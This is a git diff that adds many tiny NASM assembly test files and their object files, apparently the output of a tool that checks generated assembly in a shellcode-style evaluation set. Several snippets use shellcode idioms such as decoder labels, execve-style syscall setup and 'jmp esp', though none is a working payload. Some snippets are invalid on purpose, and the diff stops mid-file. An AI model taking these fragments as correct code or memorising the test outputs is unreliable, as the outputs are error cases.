Errors/executables/GT_315.asm new file mode 100644 index 0000000000000000000000000000000000000000..b69647d7181aeb517c7b69362daf6d967b53df78 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_315.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + scasd + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_315.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_315.obj new file mode 100644 index 0000000000000000000000000000000000000000..1f0a43ad0556c9ea79694e774a6423832196af1d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_315.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.asm new file mode 100644 index 0000000000000000000000000000000000000000..7aa64e148908778a42214679f9c05d4ff73ba197 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.obj new file mode 100644 index 0000000000000000000000000000000000000000..baf83f12a5a8d4e784f50463d051d5b2c4874db8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_319.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.asm new file mode 100644 index 0000000000000000000000000000000000000000..e53d8ca09fa4d246c1f1b88fba04e6ff37a517cf --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.asm @@ -0,0 +1,14 @@ +section .data + +shellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 0xaa + je shellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.obj new file mode 100644 index 0000000000000000000000000000000000000000..29c72f0690c1166b743847d126d304eb5e8e8b51 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_323.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.asm new file mode 100644 index 0000000000000000000000000000000000000000..9b6ebd1fd489b2946524b85a4d8b961e390286b7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al,2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.obj new file mode 100644 index 0000000000000000000000000000000000000000..0a1bfa8cf6380553852160771f97dcd1d1f2ac06 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_327.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.asm new file mode 100644 index 0000000000000000000000000000000000000000..7013a71582a08eb1fd6789421c800d4cbfcd9292 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg esp, esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.obj new file mode 100644 index 0000000000000000000000000000000000000000..c86d20021b52597074d8f189dc64959a10eba3e7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_329.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.asm new file mode 100644 index 0000000000000000000000000000000000000000..da35b11eaab9b8797fdb17d3290124b5f701c85a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push dword ebx + push dword ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.obj new file mode 100644 index 0000000000000000000000000000000000000000..5adf9b02c0097bb17c7443776370e087a9d5dd54 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_330.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.asm new file mode 100644 index 0000000000000000000000000000000000000000..a7857c57c1957c2889888eed28f7bb0e4616faa9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.asm @@ -0,0 +1,13 @@ +section .data + +decoder equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + call decoder + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.obj new file mode 100644 index 0000000000000000000000000000000000000000..2a7a3a2746782db304c0b96bf5412402d5d64e91 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_333.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.asm new file mode 100644 index 0000000000000000000000000000000000000000..ee8b9ea003afdc89a25a63d640dbb906992533dd --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + marks dw 0, 0, 0, 0 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.obj new file mode 100644 index 0000000000000000000000000000000000000000..ce41c8c447107d8ca64f4b869fe29e6f9f733aac Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_337.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.asm new file mode 100644 index 0000000000000000000000000000000000000000..be5d0da6a6bf0c20ada2c1d737c952bb59e0492b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.obj new file mode 100644 index 0000000000000000000000000000000000000000..ce0a7b70d0f73fd39c312a8b8427a4eddaa8bab6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_338.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.asm new file mode 100644 index 0000000000000000000000000000000000000000..6031e09e169bb874682cc1aa3981ef7d101fca33 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub eax, 0x013ffeff + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.obj new file mode 100644 index 0000000000000000000000000000000000000000..4f4a2a2eb461842b201c151306cb00f66441eee8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_339.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.asm new file mode 100644 index 0000000000000000000000000000000000000000..0200cffa947a4c8ba202638bd0868e0bc4c523b5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + mov ebx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.obj new file mode 100644 index 0000000000000000000000000000000000000000..80f565295b3c3768978dac14bf51316c05e86ef4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_340.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.asm new file mode 100644 index 0000000000000000000000000000000000000000..bcf06b3ea3a00c74b9df5e7aaa7a9b4e7b264c42 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 102 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.obj new file mode 100644 index 0000000000000000000000000000000000000000..c331699176ea24dcc6563a89cc76d958950376bc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_342.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.asm new file mode 100644 index 0000000000000000000000000000000000000000..1d308d2a8a816ca93a15a8819baaef49e6317175 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg ebx, ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.obj new file mode 100644 index 0000000000000000000000000000000000000000..7714e50b26622b9c745fa492687add65af5104bf Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_344.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.asm new file mode 100644 index 0000000000000000000000000000000000000000..f5f7653fddcdda33f983580fd6585a151d825956 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ebx, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.obj new file mode 100644 index 0000000000000000000000000000000000000000..e9d18ff5fcfb16f36198379dbccef2b15b759f11 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_349.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.asm new file mode 100644 index 0000000000000000000000000000000000000000..7aa64e148908778a42214679f9c05d4ff73ba197 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.obj new file mode 100644 index 0000000000000000000000000000000000000000..f3aa320fa3a34e6371eb6a7307ab700649b2c664 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_351.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.asm new file mode 100644 index 0000000000000000000000000000000000000000..3f39030cf285f69ef3f7c251217d12dca263c817 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + push ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.obj new file mode 100644 index 0000000000000000000000000000000000000000..ded491fc42ef36adc02fc43b2db70b0b7e2550f8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_356.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.asm new file mode 100644 index 0000000000000000000000000000000000000000..b235152489a049def79e3dc6ca8e3d1aaf106bf7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.asm @@ -0,0 +1,16 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + mov edx, esp + push ebx + mov ecx, esp + mov al, 0xb + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.obj new file mode 100644 index 0000000000000000000000000000000000000000..e27f264315b286719cc24cc41f22e014a6c115f6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_357.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.asm new file mode 100644 index 0000000000000000000000000000000000000000..c25db7661372deeb19ca9d221eb231f94b1bf6d9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc esi + inc esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.obj new file mode 100644 index 0000000000000000000000000000000000000000..5dcd03558103a6d1422d8f5f2fad39fde424b6b1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_36.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.asm new file mode 100644 index 0000000000000000000000000000000000000000..31f1d706ae19ef9e4c9897a858ebb0380addb004 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub byte [ebp+ecx],20h + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.obj new file mode 100644 index 0000000000000000000000000000000000000000..45fa6f429cf1032585f1ba0095720f0cd370a318 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_360.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.asm new file mode 100644 index 0000000000000000000000000000000000000000..a864ba51dc0ee3b41fbc40ea391085c589f92cca --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor byte [esi + ecx - 1], 0x3 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.obj new file mode 100644 index 0000000000000000000000000000000000000000..96fd8024e5bee34729954fbaf74f45061281b0f4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_364.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.asm new file mode 100644 index 0000000000000000000000000000000000000000..805ace6484d2f1b2987dc7e869499daf04905bca --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.obj new file mode 100644 index 0000000000000000000000000000000000000000..f41c2a81633654fd8ac401f0276e826c02a86daa Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_367.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.asm new file mode 100644 index 0000000000000000000000000000000000000000..9f0a3821f1875a127f2cf44f07a1ee567be43b67 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 19 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.obj new file mode 100644 index 0000000000000000000000000000000000000000..25798355f8dd2e195b20b430b6dc28544fdb032e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_371.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.asm new file mode 100644 index 0000000000000000000000000000000000000000..8fe1e82b8f5bfc4f71231ef30f3d97185abc594b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.asm @@ -0,0 +1,14 @@ +section .data + +shift_decode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor cl, 0XAA + jz shift_decode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.obj new file mode 100644 index 0000000000000000000000000000000000000000..25fa265d99145d39c7ab9047be1e2bbd29eb1dd0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_373.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.asm new file mode 100644 index 0000000000000000000000000000000000000000..07440adeafd7af487a32e8168119db1c273e8a40 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + nop + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.obj new file mode 100644 index 0000000000000000000000000000000000000000..3678ba609e1d5580dfb069aaa55d056bc84f9cdd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_374.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.asm new file mode 100644 index 0000000000000000000000000000000000000000..070b0efa7bde3a1934f4968284e07387463c449c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + decoded_shellcode: + call [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.obj new file mode 100644 index 0000000000000000000000000000000000000000..e9f7843194557ccb2eb86de001c8879489232218 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_375.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.asm new file mode 100644 index 0000000000000000000000000000000000000000..eaa2bac8184d6e17ee4a622caf0a0d4f19ba499e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 90 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.obj new file mode 100644 index 0000000000000000000000000000000000000000..8f7648a25893e17ebc18159b1900e870bdc2340d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_376.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_377.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_377.asm new file mode 100644 index 0000000000000000000000000000000000000000..0654b391dd8b051787253bb6c3a2d56ecc142a2e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_377.asm @@ -0,0 +1,15 @@ +section .data + +while equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp ax, bx + jne l3 + jmp while + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.asm new file mode 100644 index 0000000000000000000000000000000000000000..9e9aa86cd0086d277a91d7a5ce0a997c89d976ef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea edi, [esi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.obj new file mode 100644 index 0000000000000000000000000000000000000000..131f4fbbbf9c498d987d6c4c7bc8a0aa501e0b3d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_380.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.asm new file mode 100644 index 0000000000000000000000000000000000000000..9dc36d94290456f9d128f1b86b9381eb320a219d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + L4: + jmp short esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.obj new file mode 100644 index 0000000000000000000000000000000000000000..fb3db8515589c086b43b89ad37c7a79723ad9309 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_382.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.asm new file mode 100644 index 0000000000000000000000000000000000000000..9fd2c17c1401466b081ceb36c71ff0f261f7a60b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_385.asm @@ -0,0 +1,13 @@ +section .data + +setup equ 0x42 +myExitAddr db 0x56 + +section .text + +global 